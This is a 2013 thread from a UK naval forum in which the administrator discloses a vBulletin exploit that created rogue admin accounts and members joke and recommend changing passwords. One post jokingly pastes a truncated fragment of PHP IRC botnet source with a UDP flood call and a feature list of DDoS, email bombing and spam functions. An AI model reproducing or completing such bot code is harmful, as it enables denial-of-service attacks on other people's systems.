We've been hacked, but it doesn't seem serious

Discussion in 'Site Issues' started by Good CO, Sep 12, 2013.

Welcome to the Navy Net aka Rum Ration

The UK's largest and busiest UNofficial RN website.

The heart of the site is the forum area, including:

  1. Last week VBulletin, who make the forum software, announced that an exploit had been found which could give a hacker administrative access to the site (ie. as Good / Bad CO) - basically meaning he/she could change just about anything. We patched the exploit within minutes of the notification and it initially appeared that we were in the clear, but yesterday we found that was not the case.

    It has become clear that administrator user accounts had been created on the site. At present we think that is the limit of the success of the hackers, as the administrative control area of the site has an extra layer of protection separate from any access control by Vbulletin itself, thanks to my security paranoia.

    Was any damage done?

    None that we've found so far

    What information could have been accessed?

    It is possible that the attacker(s) could view user account details, one by one, and therefore been able to see a user's email address and IP address, and with a year or so of hard graft might have managed everyone. PMs and passwords (encrypted anyway) would have remained secure. It does though appear that the hacker(s) didn't go further than the initial account creation made possible by the exploit. This is almost certainly as they couldn't get access to the administrative area, and moved on to a softer target - the vBulletin forum of some other unfortunate online community.

    I will be working through our logs this morning checking if any personal accounts have been accessed.

    So what?

    Well, not much actually. It comes under 'operational honesty' to inform everyone about this and I will put reference to this thread in the next newsletter. After further checks we can hopefully view it as just a nice nudge to do a security audit, and perhaps a pat on the back for going the extra mile in our security measures to date.
    Last edited: Sep 12, 2013
    • Like Like x 1
  2. They stole £5,000,000 from me, It's your fault and I want it back.
  3. janner

    janner War Hero Book Reviewer

    Me to, I'll accept a cheque.
  4. Blackrat

    Blackrat War Hero Moderator Book Reviewer

    Look. Those pictures. I went to see the Rocky Horror show ok? That's all it was.
  5. I cannot tell a lie, Janner did it.
  6. sgtpepperband

    sgtpepperband War Hero Moderator Book Reviewer

    So that's why Mongke's Fist only made £11.34, after "expenses"... :shock:
  7. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. Xen Foro software is lightyears ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
  8. sgtpepperband

    sgtpepperband War Hero Moderator Book Reviewer

    • Like Like x 4
  9. wal

    wal Badgeman

    I'm with you on that Sgt.[​IMG]
    • Like Like x 1
  10. Ageing_Gracefully

    Ageing_Gracefully War Hero Moderator Book Reviewer

    ARRSE seems to have gone tits-up at the mo! Tin foil anyone?
  11. Blackrat

    Blackrat War Hero Moderator Book Reviewer

    Like, whoooooooooooaa!

  12. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    Website hacks nowadays tend to be more likely conducted by Cheltenham than China. It's all the rage apparently :pc:
  13. You got someone to type this in for you didn't you?
    • Like Like x 2
  14. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    Sadly I learnt about vBulletin vulnerabilities through necessity rather than desire.
  15. I now have access.

    I'm now in total control of all the Cash Points in Plymouth. There's £100 waiting for the first lucky RR member to get to the TSB hole in the wall in Crownhill.


    if($_GET['act'] == 'lol'){

    udpflood4($_GET['host'], $_GET['psize'], $_GET['time'], $_GET['port']);



    /* ---------------------UniX-------------------- */

    /* UniX Bot - Coding by ANoN - This code is Very PUBLIC! */

    /* + Modded UDP Flooder */

    /* + Removed TCP Flooder */

    /* + Added email bomb */

    /* + Added join message */

    /* + Added !site command */

    /* + Added whois */

    /* + Added port scan */

    /* + Added Quick UDP Flood */

    /* + Added Colors */

    /* + Added Count Command */

    /* - Removed Host (IP Address) Auth (Its bullssss) */

    /* + Added Credits */

    /* + Added Speedtest */

    /* - Removed Useless ssss */

    /* + Cleaned the code */

    /* + Added Version */

    /* + Added New nicks */

    /* + Added Update command */

    /* + Made the update command idiot proof */

    /* + Added commands command */

    /* + Added id command */

    /* + Added uptime command */

    /* + Added evidence eraser */

    /* + Added Cell Phone Spammer */

    /* + Added Cell info */

    /* + Added change prefix */

    /* + Added install update command */

    /* + Added port 3074 DDoS */

    /* + ICMP ddoS? */

    /* + FTP ddoS? */

    /* + Added 2 Player ddos feature */

    /* + Added 3 Player ddos feature */

    /* + Added 4 Player ddos feature */


    set_time_limit( 0 );

    error_reporting( 0 );

    echo "ANoNyMoUS iZ LeGioN";

    class Mike_Unix


    var $using_encode = true;

    var $config = array(

    'nickform' => 'FraseR|%d]',

    'nickform2' => '%d]',

    'prfix' => 'NzM|%d]',

    'identp' => 'Mike',

    'modes' => '+B',

    'maxrand' => 6,

    'maxrand2' => 1,

    'maxrand3' => 2,

    'maxrand4' => 3,

    'cprefix' => '.',

    'version' => '1.0',

    'host' => '*',

    'yellow' => '12',

    'blue' => '4',

    'orange' => '9',

    'green' => '7',

    'leetprefix' => '4>>',

    'leetsuffix' => '12<<',

    'leetprefixwhite' => '0>>',

    'leetsuffixwhite' => '0<<',

    'leetsuffixred' => '4<<',

    'part1' => '0?~{ 4',

    'part2' => '0}~?',

    'hostauth' => '*'


    var $messages = array

    Last edited: Sep 12, 2013
  16. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    On a slightly more serious note & not wishing to be alarmist, whilst GCO advises passwords are encrypted, for those who wish to be security conscious, it would do you no harm to change your password.

    I have, simply to safeguard online banking data. Probably paranoia, admittedly.
  17. Password re-set done. Non-flippant head on.

  18. Not a bad idea to change your passwords periodically anyway. I'd also recommend a password manager such as lastpass, keepass or roboform which will allow you to choose really strong ones
  19. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    True, many of us are guilty of not changing our passwords, but in the case of a hack, it's always a good first aid measure because the only thing that protects the individual if their details have been compromised is the volume of data available to the hacker.
  20. Just asked the NSA if they got my password and they swear they didn't, but they did ask me what it was just to confirm it so I told them and it turns out they haven't got it. Glad to know I am safe with such vigilant defenders of freedom covering my back. Whew.

Share This Page